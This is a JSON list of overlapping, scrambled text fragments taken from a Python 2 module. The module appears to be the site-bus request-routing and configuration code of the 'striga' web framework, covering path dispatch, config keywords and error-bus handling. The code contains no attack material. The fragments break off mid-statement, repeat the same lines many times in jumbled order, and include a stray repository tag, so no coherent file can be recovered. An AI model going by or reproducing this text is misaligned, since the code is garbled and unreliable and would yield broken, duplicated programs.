[ "len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val == '': val", "{} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru this (call", "self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in", "overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return", "path against this, if ok, call item from that self.DefaultBusItem = None #Call", "rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self,", "'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus", "= os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename", "CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru", "striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not", "Entry point to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir", "PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru this (call each)", "= '==0', rootdir = '.'): ''' Config keyword - Controller ''' from ._stsvcsb_cntrlr", "self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s'", "functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source, entry, path = None, pathlimit =", "class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = []", "0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val == '': val = default", "'!' : self._configure_finished, }) return defs def __configure_location(self, conffilename, path = None, index", "= '.'): ''' @param path - can be None as location can be", "try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue", "os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory: '%s'\" % (self.RootDir))", "change path array if len(path) == 0: if self.Index is not None: path.append(self.Index)", "ok, call item from that self.DefaultBusItem = None #Call when not found anything", "def BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None)", "nbi return nbi def _configure(self, conffilename, index = None, rootdir = None): if", "return nbi def _configure(self, conffilename, index = None, rootdir = None): if rootdir", "processing:\") raise prev_excvalue else: raise def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm,", "self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise", "None, pathlimit = '==0', rootdir = '.'): ''' Config keyword - exec '''", "None def _InsertBusItem(self, path, createitemfnct): if path is None: if self.DefaultBusItem is not", "sitebus item too ''' from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir", "source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self, ctx,", "not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem = createitemfnct() return", "0: if self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item", "= None, rootdir = '.'): ''' @param path - can be None as", "= self try: #First iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path)", "None, rootdir = '.'): ''' @param path - can be None as location", "'Controller', path = None, pathlimit = '==0', rootdir = '.'): ''' Config keyword", "self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec,", "use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception", "= self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self):", "if self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in", "None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is", "createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename, index = None, rootdir", "Config keyword - serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern,", "bus processing (you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath)", "'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path): if len(path) == 0: raise", "None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus", "L.warning(\"Bus item root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index = index defs", "L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx,", "ibm(ctx, path) #Check again as IntroBusItems can change path array if len(path) ==", "BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues():", "self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems:", "'%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist: '%s'\" % (self.RootDir))", "__configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern,", "try: #First iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check again", "''' Config keyword - view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir,", "def __configure_serve(self, conffilename, pattern, path = None, buffersize = 64*1024): ''' Config keyword", "L.warning(\"Bus item root directory is not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item", "thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus", "= rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is not None:", "mode, path = None, entry='main', pathlimit='==0'): ''' Config keyword - view ''' from", "functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path = None, entry='main',", "busname)) def __configure_exec(self, conffilename, source, entry, path = None, pathlimit = '==0', rootdir", "self.IntroBusItems = [] #Iterate thru this (call each) in the begining self.CrossroadBusItems =", "this (call each) in the begining self.CrossroadBusItems = {} #Check path against this,", "rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is not None: L.warning(\"Bus", "is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus", "from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename", "as location can be default sitebus item too ''' from ._stsvcsb_location import Location", "<gh_stars>0 import os, sys, re, functools, copy, logging as L import striga.core.exception ###", "if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" % path) nbi", "raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" % path) nbi = createitemfnct()", ": self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' :", "self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller,", "entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path = None, pathlimit", "= [] #Iterate thru this (call each) in the begining self.CrossroadBusItems = {}", "import Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename =", "found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: #", "except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None:", "self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir =", "= createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename, index = None,", "self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path =", "rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item", "= os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index = index, rootdir = rootdir)", "default sitebus item too ''' from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location)", ": self._configure_finished, }) return defs def __configure_location(self, conffilename, path = None, index =", "conffilename, index = index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'):", "L import striga.core.exception ### class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def", "for '%s' is already configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi", "path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename, index", "find item in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is", "view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit))", "rootdir = '.'): ''' Config keyword - exec ''' from ._stsvcsb_exec import Exec", "[] #Iterate thru this (call each) in the begining self.CrossroadBusItems = {} #Check", "not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist: '%s'\"", "rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if", "''' Config keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component,", "DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is None: bm = self.DefaultBusItem if", "'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!'", "''' Config keyword - serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir,", "None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\")", "None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if path is None: if", "componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename,", "return False except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue else: raise def", "= os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self, conffilename,", "entry='main', pathlimit='==0'): ''' Config keyword - view ''' from ._stsvcsb_view import View self._InsertBusItem(path,", "._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename,", "self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop()", "from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source, entry,", "raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val == '': val = default ctx.req.Vars.SITEBUS[name]", "each) in the begining self.CrossroadBusItems = {} #Check path against this, if ok,", "= conffilename) def _configure_finished(self): pass def __call__(self, ctx, path): ''' Entry point to", "os, sys, re, functools, copy, logging as L import striga.core.exception ### class Bus(object):", "def _configure(self, conffilename, index = None, rootdir = None): if rootdir is None:", "'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is", "self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass = 'Controller',", "not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase:", "''' Config keyword - exec ''' from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir,", "prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath =", "processing (you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return", "path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem bm =", "directory is not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory doesn't", "if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not", "pass def __call__(self, ctx, path): ''' Entry point to this bus object '''", "this, if ok, call item from that self.DefaultBusItem = None #Call when not", "% (self.RootDir)) self.Index = index defs = {} for key, fn in self.CustomSiteBusDefs.iteritems():", "self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if path is None: if self.DefaultBusItem", "= ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First iterate thru IntroBusItems", "functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def", "'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view'", "import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass,", "### def BusVar(name, default, ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val", "array if len(path) == 0: if self.Index is not None: path.append(self.Index) else: raise", "Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate", "= None): if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if", "'.'): ''' @param path - can be None as location can be default", "striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue =", "- view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry,", "__configure_location(self, conffilename, path = None, index = None, rootdir = '.'): ''' @param", "is already configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi", "__configure_view(self, conffilename, source, mode, path = None, entry='main', pathlimit='==0'): ''' Config keyword -", "source, controllerclass = 'Controller', path = None, pathlimit = '==0', rootdir = '.'):", "''' @param path - can be None as location can be default sitebus", ": self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, }) return defs def __configure_location(self,", "= None def _InsertBusItem(self, path, createitemfnct): if path is None: if self.DefaultBusItem is", "= index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus", "striga.core.exception ### class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems", "os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename =", "_configure_finished(self): pass def __call__(self, ctx, path): ''' Entry point to this bus object", "for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if", "= createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\"", "import os, sys, re, functools, copy, logging as L import striga.core.exception ### class", "is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems &", "not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus", "= {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru this", "path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is", "can be default sitebus item too ''' from ._stsvcsb_location import Location l =", "rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return", "& DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is None: bm = self.DefaultBusItem", "raise def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm", "item is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None:", "item from that self.DefaultBusItem = None #Call when not found anything in self.CrossroadBusItems", "re, functools, copy, logging as L import striga.core.exception ### class Bus(object): CustomSiteBusDefs =", "serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self,", "SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First iterate thru", "in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can change path array if", "= 'Controller', path = None, pathlimit = '==0', rootdir = '.'): ''' Config", "in self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus = None def _InsertBusItem(self,", "= None #Call when not found anything in self.CrossroadBusItems self.RootDir = None self.Index", "conffilename) def _configure_finished(self): pass def __call__(self, ctx, path): ''' Entry point to this", "createitemfnct): if path is None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus", "- componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self,", "self.CrossroadBusItems.get(path[0], None) if bm is None: bm = self.DefaultBusItem if bm is None:", "View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path", "bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and", "pathlimit)) def __configure_componentbus(self, conffilename, component, path = None, busname = 'componentbus'): ''' Config", "= '.'): ''' Config keyword - exec ''' from ._stsvcsb_exec import Exec rootdir", "else: L.warning(\"Bus item root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index = index", "and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self): if", "None, buffersize = 64*1024): ''' Config keyword - serve ''' from ._stsvcsb_serve import", "path = None, busname = 'componentbus'): ''' Config keyword - componentbus ''' from", "None self.Index = None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if path", "= self.RootDir SiteBusVar['Location'] = self try: #First iterate thru IntroBusItems for ibm in", "val = path.pop(0) if val == '': val = default ctx.req.Vars.SITEBUS[name] = val", "'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec'", "% path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" %", "functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path = None,", "pathlimit='==0'): ''' Config keyword - view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View,", "copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else:", "not found anything in self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus =", "'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is", "self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass", "bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is", "bm.BusStop() ### def BusVar(name, default, ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound')", "nbi def _configure(self, conffilename, index = None, rootdir = None): if rootdir is", "(self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index =", "index = index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if", "location can be default sitebus item too ''' from ._stsvcsb_location import Location l", "@param path - can be None as location can be default sitebus item", "'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller'", "None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem", "else: L.exception(\"Generic exception during bus processing (you should use StrigaBusError exceptions)\") epath =", "__call__(self, ctx, path): ''' Entry point to this bus object ''' SiteBusVar =", "None, rootdir = None): if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir =", "None: L.warning(\"Bus item has already one errorbus defined - overwriting\") from ._stsvcsb_errorbus import", "None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm", "epath) return False except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue else: raise", "= os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename, source,", "except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue else: raise def BusStart(self): for", "already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid", "path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except", "hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm", "can be None as location can be default sitebus item too ''' from", "def __configure_componentbus(self, conffilename, component, path = None, busname = 'componentbus'): ''' Config keyword", "name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path =", "default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path = None,", "defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' :", "= path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus", "already configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def", "''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First iterate", "self.ErrorBus is not None: L.warning(\"Bus item has already one errorbus defined - overwriting\")", "keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def", "# Redirections are not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2]", "mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path = None, busname = 'componentbus'):", "controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self, ctx, path):", "during bus processing (you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx,", "self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source, entry, path = None, pathlimit", "def __configure_exec(self, conffilename, source, entry, path = None, pathlimit = '==0', rootdir =", "._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit))", "._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source,", "''' Entry point to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] =", "= ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you should use StrigaBusError exceptions)\")", "''' from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source,", "= self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index =", "Config keyword - Controller ''' from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir)", "if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path):", "= None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if path is None:", "rootdir = '.'): if self.ErrorBus is not None: L.warning(\"Bus item has already one", "os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index = index, rootdir = rootdir) def", "error bus processing:\") raise prev_excvalue else: raise def BusStart(self): for bm in self.IntroBusItems:", "None, index = None, rootdir = '.'): ''' @param path - can be", "''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source,", "sys, re, functools, copy, logging as L import striga.core.exception ### class Bus(object): CustomSiteBusDefs", "this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self", "ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir", "not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory: '%s'\" %", "bm = self.CrossroadBusItems.get(path[0], None) if bm is None: bm = self.DefaultBusItem if bm", "(self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if", "path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val ==", "Controller ''' from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path,", "bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path)", "raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if", "'==0', rootdir = '.'): ''' Config keyword - exec ''' from ._stsvcsb_exec import", "= str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error bus processing:\")", "self.__configure_componentbus, '!' : self._configure_finished, }) return defs def __configure_location(self, conffilename, path = None,", "- serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def", "rootdir = rootdir) def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default))", "self.RootDir SiteBusVar['Location'] = self try: #First iterate thru IntroBusItems for ibm in self.IntroBusItems:", "Config keyword - exec ''' from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir)", "from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source,", "self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished,", "% path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename,", "as IntroBusItems can change path array if len(path) == 0: if self.Index is", "if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ###", "conffilename, source, controllerclass = 'Controller', path = None, pathlimit = '==0', rootdir =", "self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems", "can change path array if len(path) == 0: if self.Index is not None:", "bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm,", "'.'): ''' Config keyword - exec ''' from ._stsvcsb_exec import Exec rootdir =", "os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory: '%s'\" % 